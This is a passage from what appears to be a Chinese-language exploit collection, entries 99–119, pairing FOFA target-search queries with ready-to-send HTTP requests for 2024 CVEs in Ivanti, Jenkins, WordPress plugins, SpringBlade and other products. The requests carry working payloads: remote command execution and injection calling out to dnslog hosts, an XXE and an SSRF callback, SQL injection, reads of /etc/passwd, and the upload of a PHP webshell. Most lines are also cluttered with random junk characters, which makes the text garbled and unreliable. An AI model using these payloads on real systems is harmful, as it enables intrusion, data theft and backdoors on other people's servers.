|' X; b% g& z, n6 h, GAccept-Encoding: gzip, deflate9 S' N( S2 f, Q2 D- E, P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 M) M3 v% l5 Z& Z) pContent-Type: application/x-www-form-urlencoded; charset=UTF-8
; ?7 p D; ^' CX-Requested-With: XMLHttpRequest
) |: M2 x" ^9 |* h! A+ p1 V! T" v0 H+ g! i- C$ Z2 b* J1 q
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
' f( M1 h) b) c& w3 H( n+ N1 P7 ?# e$ S
( }* a/ l' v* @$ s; i' Z0 C99. Ncast盈可视高清智能录播系统busiFacade RCE
% ~8 q# @) w* p" r5 X2 XCVE-2024-0305 {4 w+ }& m3 v
FOFA:app="Ncast-产品" && title=="高清智能录播系统"4 o: |3 z- U ^0 ]- L. W) B
POST /classes/common/busiFacade.php HTTP/1.1/ s+ ?, Y8 j! O5 B+ j
Host: 192.168.40.130:8080 n1 s n% S2 u1 H: x3 T5 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& N% c2 }6 @& V( E: XConnection: close
6 Q" F* v6 N- n4 ~! ?. V! XContent-Length: 154
( N! W0 j2 x. ?2 i8 @7 i6 a+ iAccept: */*: C( I2 C3 y* g h
Accept-Encoding: gzip, deflate) m5 L( M0 l/ Q( i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ x0 ^- x0 F. z" R! eContent-Type: application/x-www-form-urlencoded; charset=UTF-8
! y; ]# B8 x# eX-Requested-With: XMLHttpRequest
: B! \$ |2 U5 F( E4 c C/ }; R, n8 K" s! ~# g; z" J6 a0 E$ m
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D0 y1 \) \, {, l
+ J3 U F* f7 E: \3 v/ O
# T6 q5 \ ~5 D% B7 b3 a100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传9 D" i$ i8 y$ w, I
CVE-2024-0352
/ n9 h d1 x& L( f# |& a. G, bFOFA:icon_hash="874152924"1 i- A4 I9 ^5 P0 T. k+ h
POST /api/file/formimage HTTP/1.1
2 d u% `6 \" J5 \) ?: [: R0 LHost: 192.168.40.130
* I" j% V: F* v; v1 WUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36& x4 W$ z+ d1 D
Connection: close3 |: c- Z1 n% d0 ?* Y
Content-Length: 201+ w4 p/ Z- Q/ K5 \0 J2 o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei4 C: A+ R+ Y1 o, h- E: t
Accept-Encoding: gzip, E) t: T; I( |8 m! K6 \' [
7 q- S- {( X! x7 _$ s
------WebKitFormBoundarygcflwtei
" |/ ~4 a1 a* b# r. wContent-Disposition: form-data; name="file";filename="IE4MGP.php"
p# I ^; g( F lContent-Type: application/x-php
; l( S, D; Z: y8 ~1 h
2 O- p$ }" ~7 T/ C6 ^2ayyhRXiAsKXL8olvF5s4qqyI2O
5 J/ r# h& z1 x6 M" s/ U------WebKitFormBoundarygcflwtei--
4 {( U# p# m+ H) N2 ^2 i1 g+ J0 ~1 _( ^9 i
6 o8 D$ h2 H( e
101. ivanti policy secure-22.6命令注入9 H$ H- K$ y( C) B! t* f0 \
CVE-2024-21887
6 @) R( u- R4 @! | ?+ q$ I6 b/ B" _FOFA:body="welcome.cgi?p=logo"
: L, S+ X, j' W% j2 {7 j" r& M0 kGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
0 q y' P, N/ T, _. ~Host: x.x.x.xx.x.x.x' j( b+ F4 q' }' n0 P) ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! W: C6 a; F: q" `! b' a( jConnection: close/ t2 e. ]' E( ~
Accept-Encoding: gzip
# N/ d) d, a" c6 S. b( _" O+ r8 c) b3 I& W8 D
! |8 e5 S% D! ?* C- X102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行' B/ F& O- K f( _! s- V0 \+ s
CVE-2024-21893& w; o, ^: l4 n, ^; y8 \
FOFA:body="welcome.cgi?p=logo"
# M8 y3 i/ }7 T; a4 i3 x/ z4 h* yPOST /dana-ws/saml20.ws HTTP/1.1" S/ g) v* q. u- w+ k$ N# J2 `
Host: x.x.x.x2 E A% W; l" ~. l# J& |8 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 y2 ~ z4 g2 [
Connection: close- a& {5 F. X+ H9 u, x! u$ N9 _
Content-Length: 792
, e% A( W6 Y; s# X hAccept-Encoding: gzip
* U5 M! A1 e" }9 G4 t
6 J+ l, ^) P1 E& f- `<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
0 N4 D% M# [% @( l* H9 a2 e9 F
103. Ivanti Pulse Connect Secure VPN XXE
+ K& v* E7 F" T% v) Y$ T# c( dCVE-2024-22024" X5 V' v$ W$ g9 ^
FOFA:body="welcome.cgi?p=logo"
, \( b8 Y0 J, ?7 ePOST /dana-na/auth/saml-sso.cgi HTTP/1.1
' p* }% T' J" ~7 a# z, {" L% f* gHost: 192.168.40.130:1113 J/ a% _7 ^" W$ q8 U
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
1 i: M/ w1 ]: C# k* s; lConnection: close
- h: p$ @( A3 g# ]) ~Content-Length: 204
$ h. H7 i/ t5 jContent-Type: application/x-www-form-urlencoded
" R N3 j+ X0 C D) Z/ TAccept-Encoding: gzip
' z7 }% i& a: C/ p. {1 V: q3 K- Q- s6 k5 [$ E, u
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
- R, p4 H# V" S) R: w# ~7 F! p9 n( d+ Z
; C. r7 Z7 n9 s: P) F其中SAMLRequest的值是xml文件内容的base64值,xml文件如下5 l9 c# `; M) Z `
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>+ U: C. }, v( }# J n
% [, `1 z% t# Y1 H
1 n# @1 \( U* W. f; Y104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露% X R) C' v/ n! f k- G
CVE-2024-0569" {1 G# X1 S( q
FOFA:title="TOTOLINK"
+ G% I0 N& C X$ H" k$ u9 GPOST /cgi-bin/cstecgi.cgi HTTP/1.1
+ Q" Q* o- y( @+ @0 uHost:192.168.0.1
6 s' _! x$ T1 }* uContent-Length:41, ~0 z. N6 H# L6 Y3 b
Accept:application/json,text/javascript,*/*;q=0.010 [) @) k1 A6 T1 N
X-Requested-with: XMLHttpRequest
t4 S1 x/ G: I2 z+ k lUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36& Z \. y2 `$ `, Q2 z
Content-Type: application/x-www-form-urlencoded:charset=UTF-8+ W5 N3 u* }( c2 ?% l! g1 ^
Origin: http://192.168.0.1
& ?0 @, v3 T2 y0 \/ mReferer: http://192.168.0.1/advance/index.html?time=1671152380564# p' C `2 ^) n- [ }. J9 i2 h5 f% ?6 h
Accept-Encoding:gzip,deflate. g. m: ?; M1 t7 L9 z8 n+ Y7 V
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.71 J% t* {( m1 C# B
Connection:close6 I2 g6 u; }6 f' K* t* e6 ]$ D5 K% l
/ V; [6 m8 J3 K8 S' Q/ X' [
{6 i3 V1 @, a- R+ p2 S
"topicurl":"getSysStatusCfg",7 ~) [% I2 W8 t" G5 y
"token":""- t* M6 ]! S) m
}
8 K$ d% U& r/ T% Y+ O; B, i8 B! ?- K- Z# Q/ M0 z9 E c
105. SpringBlade v3.2.0 export-user SQL 注入
. m. x" y D; J7 eFOFA:body="https://bladex.vip"
% t) ^) U" z2 ~3 ?3 ?- c3 x zhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
5 p9 _( {5 ]) q0 o3 R$ }, z& a: j, L
' Q a$ _4 i+ J+ F$ _) H1 p106. SpringBlade dict-biz/list SQL 注入: \9 N2 S: j/ l" R- ? X: [$ z
FOFA:body="Saber 将不能正常工作"
( J1 ]9 k& w9 U e I, M( b! F1 TGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
, ]2 t" @% F. M- Z0 k% c9 FHost: your-ip
( d" T$ i; t/ f+ U. o0 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ S; X1 N4 `3 [* y- ?3 {2 l" iBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
8 [+ g& Z: ~) q) O! C- L$ VAccept-Encoding: gzip, deflate; m( H5 `, a9 L" P! L
Accept-Language: zh-CN,zh;q=0.91 n' B) T4 y$ }7 _: c' t
Connection: close
5 Y- B$ R' M: E& @' f' z4 b& f0 B3 U" U1 I! b ^
+ z6 p# e$ U. M107. SpringBlade tenant/list SQL 注入
( P) Z$ c! H8 i9 a$ q! e& OFOFA:body="https://bladex.vip", x) \( ^& z3 j' [! N+ w, \
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.10 ^* K* ?2 y6 ~
Host: your-ip
+ i+ [8 ]' K7 n+ E* }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( w/ z0 G" q5 {6 ^
Blade-Auth:替换为自己的* T: a0 s. ]9 p7 B3 i1 @* t2 z
Connection: close" r. @8 p1 P* v
5 ~2 @( E9 x) E) s: C' [( L$ _
6 W1 q% K0 G* i3 I6 g6 m
108. D-Tale 3.9.0 SSRF
# b( R% s3 Z- J2 w* ~- V+ YCVE-2024-21642
8 K' M! D/ l0 G3 DFOFA:"dtale/static/images/favicon.png"
2 ~# V/ E( w+ ^& A# Q- R& R4 ~GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1: |; J; V `8 ~6 U& ]9 l7 ^# j
Host: your-ip
6 d# y( G0 N$ P, Y* b7 gAccept: application/json, text/plain, */*3 Z, J: `0 u; K, E& O% n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" y5 E4 x: b. y+ i& B8 D5 E% U
Accept-Encoding: gzip, deflate
! i& W( g3 l3 F$ ~Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
; ]) b. h2 m" ] p) Z) ]2 [2 g5 L# OConnection: close
. f! `5 E4 E$ f+ d
6 U% T6 `6 s5 F: Q$ @+ q
+ j0 T; q) y' h, |+ Z109. Jenkins CLI 任意文件读取
0 W$ Z0 t& Y2 q- rCVE-2024-23897
9 y3 V' S/ c- bFOFA:header="X-Jenkins"
' C3 h: h; m) D$ H: L. N* }POST /cli?remoting=false HTTP/1.1
! g/ P" t( O2 oHost:
$ J3 N Y( S# T% I. wContent-type: application/octet-stream
8 `! @' i+ D! |5 T& KSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
1 d7 Q0 n- [9 BSide: upload: h& m/ ~) k; _3 u3 ^
Connection: keep-alive
/ Z# W* u" `- L9 Q# kContent-Length: 163
/ U5 o) s/ h) ^/ C Q3 A+ a3 e1 B) h2 N! p; T+ u r
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
2 S; y9 d0 B9 M3 P! D% T" Q
! v$ @. V6 k5 t. I2 k% i
+ M* j4 [* g" V, z/ T; [' V1 IPOST /cli?remoting=false HTTP/1.1, ?# {% Y9 `: |# ]/ N
Host:3 h; Y3 ^2 Y+ b* R( K
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
$ V: i3 d/ a4 W# m5 Tdownload( i; {' g7 B. t1 p2 U3 n6 X! ?$ s% B
Content-Type: application/x-www-form-urlencoded
9 B$ t9 v. Y2 W2 W! u+ |" wContent-Length: 0
1 R& {& V7 }" d* B9 I
( y4 |2 U- E7 M8 w; i8 {$ G5 i" H9 n% w2 y
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- L+ Q# v& Y7 \# m8 T5 U5 d; Ljava -jar jenkins-cli.jar help
& m2 ?6 Q0 ?. j! C r" Y0 i[COMMAND]% y8 L$ w5 t- O2 e! m
Lists all the available commands or a detailed description of single command.
1 K0 h! Z+ v$ ~) F COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
) U: U9 U' T3 r4 H. T+ x% a& h
( G% @3 s! P0 _! d7 }3 T$ y' @5 I& Q3 { x$ T+ C
110. Goanywhere MFT 未授权创建管理员4 t! @. A$ o% b' w$ o. z
CVE-2024-02040 y. b2 s% B9 m/ u
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
9 f" t9 L1 z CGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
" R- q! V* d- H+ p6 @Host: 192.168.40.130:8000* ^4 d' k! W* f q* G* r& Y) O
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.362 R* {# V* G6 R1 R+ a5 K
Connection: close1 h4 X" d5 ^' S3 a. T) T$ K% Y
Accept: */** \; x/ ^$ a6 n) g$ f* l/ O
Accept-Language: en, \6 a+ o- ?$ e+ _
Accept-Encoding: gzip
- U8 u' j b7 g" a% o2 w& Q' Z5 J# S9 z3 V' j8 e% k4 r5 u
/ W9 P2 P6 {/ i+ L, L111. WordPress Plugin HTML5 Video Player SQL注入
& o! Z3 ]8 f- }CVE-2024-1061' S7 k* B9 ?; Y% r6 q, \3 M' f; S
FOFA:"wordpress" && body="html5-video-player"
2 s! c" o7 W9 p3 m3 H, NGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
( G/ ~% n( ~% G5 |; E* THost: 192.168.40.130:112
b; S5 {1 l. @( a8 S$ k# s( q, bUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.362 D; C. P/ T: T. R3 P, A% z, Y
Connection: close) ?& m& z* X9 u$ `/ }# Z$ r4 C0 w
Accept: */*$ Y" ?& k X9 T# h8 Y1 U
Accept-Language: en
4 ?$ B1 w/ E3 V4 xAccept-Encoding: gzip
1 c7 K2 b+ Q ]3 p: K: |& Q: S9 N
$ F* h; x3 d' J [
' L, e* k" S' B+ B112. WordPress Plugin NotificationX SQL 注入
+ @, p+ d& u$ k- G4 n' T8 d" aCVE-2024-16985 ]& k3 q4 O* l- c# q2 |7 q0 k
FOFA:body="/wp-content/plugins/notificationx"
+ T7 y5 Z7 ~" c7 EPOST /wp-json/notificationx/v1/analytics HTTP/1.1. |( i& A5 Q4 c9 D( {8 m f1 F1 y
Host: {{Hostname}}
' n; o* U9 v# D$ v$ H8 OContent-Type: application/json$ S) L) [' { t9 x
% H$ k% i+ S" Y; ^6 I
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
# t; K+ W/ m+ m3 ~
; t! n: x! X, j1 P. {
8 g" }% g+ i# c* s B7 h9 r+ F113. WordPress Automatic 插件任意文件下载和SSRF
1 f! W+ @9 d8 P( `: |4 H0 nCVE-2024-27954
: K: \, g3 ^# F7 [" ~FOFA:"/wp-content/plugins/wp-automatic"9 f1 X1 E' c% O3 P
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
: m( C' j. b1 f9 _, F/ [. SHost: x.x.x.x' M% L- ^3 }: p( r) p
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
& t! b' B9 D n: D! a1 R+ OConnection: close+ n$ _9 b1 u5 y+ ?
Accept: */*
5 s" {8 o# `$ r+ t5 sAccept-Language: en, i. d* H6 I3 |9 X! M$ p
Accept-Encoding: gzip
! i2 @) p# F+ D+ h# Q; {; ]) u8 [* J, R8 T
5 W: L; k( k, c114. WordPress MasterStudy LMS插件 SQL注入
' S% X* I3 B& [FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"8 I g) v: H/ X, W
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.12 j# V, v8 y. x, v9 z' A1 @, f
Host: your-ip5 M ?' f6 Y% G3 o: ^% ? H1 }
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.360 R3 w% Q8 C" Q" d4 P
Accept-Charset: utf-84 H1 L( G& {' L$ k6 W7 t# \
Accept-Encoding: gzip, deflate5 p2 p* T5 V# o& S' _7 l6 B# p: ^
Connection: close
4 v* Z. r. |/ |' }' K. K& M a& u; m/ c2 S9 g/ L
' y8 Z* o: B5 h5 ^
115. WordPress Bricks Builder <= 1.9.6 RCE
' ?) w6 z5 b- l& wCVE-2024-25600
! b" P ^: \( s, J, LFOFA: body="/wp-content/themes/bricks/"
0 J, G0 N5 O% z' @1 H' M第一步,获取网站的nonce值
7 d7 N- t' f2 K+ c" \GET / HTTP/1.1. \, ]; M) e2 Z6 ^5 G3 p
Host: x.x.x.x! ?5 y- U1 i0 q
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36# U) [& D) B5 X
Connection: close
6 t) }( y( D; Z; ?Accept-Encoding: gzip/ Q+ z2 Z6 @9 O2 C; s) K& V
. A( D8 y. _4 C' L( Z6 J1 L6 R" i3 N
第二步替换nonce值,执行命令: N8 o, d7 l& E- w
POST /wp-json/bricks/v1/render_element HTTP/1.1# U" L$ y0 y+ H8 Y, D
Host: x.x.x.x
" H- {$ p1 J+ _& K9 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
9 {6 `% O$ d( j4 `7 ~1 c% `Connection: close- ~0 i8 Y t& u9 r" o( X( l
Content-Length: 356
; x: {+ _$ S2 p/ _Content-Type: application/json
, Q3 b" n9 b& C' ]7 LAccept-Encoding: gzip& {) X( N, |. S* P% D1 ^
/ K% }) E; ~, G9 x{* |' X- i+ d: Y& t3 f5 v
"postId": "1",/ D+ S& t( I$ L# S# C; L
"nonce": "第一步获得的值",
/ h {4 y0 J2 w$ m O) [ "element": {
; J7 q$ W: u( G+ L- ] "name": "container",
* M' j" r' x( q4 K+ u: j/ ~ "settings": {
, }2 E/ r0 G: v9 J, s N "hasLoop": "true",
1 a8 a7 X; b8 y/ k "query": {$ M% d# Q2 p+ R1 T
"useQueryEditor": true,% B8 n# u5 Q. F. _5 B" ]( \2 R: i
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
' A: e4 H( \9 Q0 b "objectType": "post") `% w1 F- Z1 b! n9 R& \1 x
}
! Q2 }: R3 s+ n0 R* n# o, u }& E, T% C! s$ W' ^. F
}; y1 Q/ m6 n: ?) U
}
! S& ]2 c J6 S0 R
: B. c, g! a8 W: N3 L/ f8 A Q n& n% V l2 w7 }( U4 p
116. wordpress js-support-ticket文件上传
3 N! ?% k6 Y' N N pFOFA:body="wp-content/plugins/js-support-ticket"
1 X9 A1 ~1 u/ W4 Z* F% J8 uPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
5 p! `; f+ E5 t5 EHost:
$ u) `( C+ I1 m* O M6 H8 NContent-Type: multipart/form-data; boundary=--------767099171
. \3 X) }: j$ h6 l- i( KUser-Agent: Mozilla/5.0
+ l1 C0 f1 Q7 E/ t4 V3 S0 M& b% n% w
9 i1 ?# S4 L$ C, G2 m6 O, O+ q----------7670991712 S5 [ h1 v% q
Content-Disposition: form-data; name="action"6 G8 R- p W) I) [3 M
configuration_saveconfiguration; Z9 ^* a3 |% E' u5 A& R
----------767099171
; B* K0 p) ^6 d' w! M0 h M' gContent-Disposition: form-data; name="form_request"
( Z! B$ x8 Y6 f& y& |) g6 S+ R9 O9 y# x4 Djssupportticket
9 e" L. Z" T$ Y0 Q7 E7 |! S8 P----------767099171
% X2 C, [, _! T- i8 aContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"( b7 E; L" C1 }0 t
Content-Type: image/png
4 u/ A$ a: k; g ~9 Y----------767099171--8 g2 _4 e- W: R9 U2 h/ P% ^
7 o) `/ u/ C3 c) L3 R4 k" G
. F9 J, E4 E) v: W ~& j( q117. WordPress LayerSlider插件SQL注入
7 v8 a0 A9 Q! m9 `; _1 L1 Dversion:7.9.11 – 7.10.0
2 b, {) Q6 p9 AFOFA:body="/wp-content/plugins/LayerSlider/"
( ]: F2 Y2 k) J& C% \+ Q5 \* G6 Q5 iGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
, u9 u# B0 F) v3 pHost: your-ip' Q, U& z" R6 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ g8 z5 j7 V- xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- v7 |% r# U7 o( |& J8 D4 \! m( A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 z& R( D/ p8 \, ]2 q4 j
Accept-Encoding: gzip, deflate, br D: w4 _8 Y2 s w' ?) c$ F
Connection: close# r# [. X6 Z8 Y2 ?8 Q. j4 I' S2 y6 q8 G
Upgrade-Insecure-Requests: 1
# | O" `) z6 W0 B! b0 t
0 u+ r, P. K' p5 ~: G0 }9 D) ~: B1 H8 G
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传' S0 o& `+ G* `5 o
CVE-2024-0939
7 w8 \+ x7 M7 E3 F7 B0 Y; }$ ZFOFA:title="Smart管理平台"* O& q O0 k' ~' `* I
POST /Tool/uploadfile.php? HTTP/1.1
5 O3 u9 z& e6 U0 I: Z5 n4 ^& S( IHost: 192.168.40.130:8443
& `* e# Y; t+ U4 p& b9 c/ QCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8' ]8 O. w" G) X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0, h3 X" |4 T$ a ]0 a1 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. |) w0 q: }! @' H0 [9 }9 y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 c3 y2 B8 Y n* z, vAccept-Encoding: gzip, deflate
) ~; q/ G; c1 D( t+ ZContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887/ s' S, ~( ~. w$ ]
Content-Length: 405
/ G$ E0 U1 g$ VOrigin: https://192.168.40.130:8443
" K, h( {% D# V _* b2 l+ TReferer: https://192.168.40.130:8443/Tool/uploadfile.php1 u Z$ t3 `9 }7 B$ K, T
Upgrade-Insecure-Requests: 1; K& e) ~3 D* z, Q+ V; p
Sec-Fetch-Dest: document
5 d* f5 l" P+ y: R& jSec-Fetch-Mode: navigate
( u, G/ P5 g7 j. y% z; K& q3 JSec-Fetch-Site: same-origin
1 [5 \$ x: d/ Q3 d. ]6 ^( FSec-Fetch-User: ?1
4 ]6 }/ W8 r( ~: L( `% `Te: trailers
p8 {, T& R4 Z3 N0 X! G" s1 \$ OConnection: close( a; U, T( p% {4 ?! {! z4 p
- H) m6 y2 d$ i
-----------------------------139797012227476466340371828878 P% W2 _# W* L- p, L# t6 ]! ]# {& L
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
" v& w) Q3 d5 i! WContent-Type: application/octet-stream
/ K0 }1 V5 b! @* h4 O/ _, h+ b: H/ B! n7 a& U* u% a2 q
<?php
+ H/ R, k+ F2 N/ u6 Zsystem($_POST["passwd"]);, @0 e. V4 b' u/ Z
?># G) y. R4 g# [$ ]
-----------------------------139797012227476466340371828877 Q# n* ]8 G- \1 v) N' R4 O
Content-Disposition: form-data; name="txt_path"! A8 ~* c" U; H' P& ^ R
6 L+ u! q, P+ `3 O
/home/src.php
- K2 v6 _; x3 }+ `. l) X1 J2 x-----------------------------13979701222747646634037182887--
* ?! `$ N7 Q) i+ {3 u( l, Q. ], M) w* w% J; Y
& I! T' F- y. l9 y4 U2 W: v访问/home/src.php& D3 T) Z* n; s/ j
% F1 h* p; c* j5 G119. 北京百绰智能S20后台sysmanageajax.php sql注入( t/ v2 [5 k. D9 [" R. \9 B+ m6 c
CVE-2024-1254% v0 D, E# p- e' s- Q( r3 j
FOFA:title="Smart管理平台": N L( {* i" B/ L
先登录进入系统,默认账号密码为admin/admin+ p6 `. O: ]7 y+ E# J! R1 c f1 o2 I
POST /sysmanage/sysmanageajax.php HTTP/1.11
" [ N5 O) ?9 [/ W3 wHost: x.x.x.x
4 C2 J9 s3 h( U* ]& Q. E: d2 KCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
$ k/ }6 i9 d7 V7 W P) ^. [. lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0! Y& e3 @" D& m1 r
Accept: */*
$ w6 @5 s! B2 A1 j0 e! yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, f5 ?7 T; A+ \, F X( \% [# e: {Accept-Encoding: gzip, deflate
' D* }2 H; ]# ^1 UContent-Type: application/x-www-form-urlencoded;
0 `* `4 w x# a8 K! z+ zContent-Length: 109
8 j! o4 f: H9 O. m2 Q2 f9 \2 WOrigin: https://58.18.133.60:8443+ T4 \; |# U6 w
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php4 P2 m7 ^ A5 r5 H9 C4 u5 ^
Sec-Fetch-Dest: empty
1 W1 v" ?9 p4 M# B( T: l$ YSec-Fetch-Mode: cors
* `% f8 p7 v$ [, }6 O6 `; x# FSec-Fetch-Site: same-origin# b! p7 B; b7 U+ N' i% ?
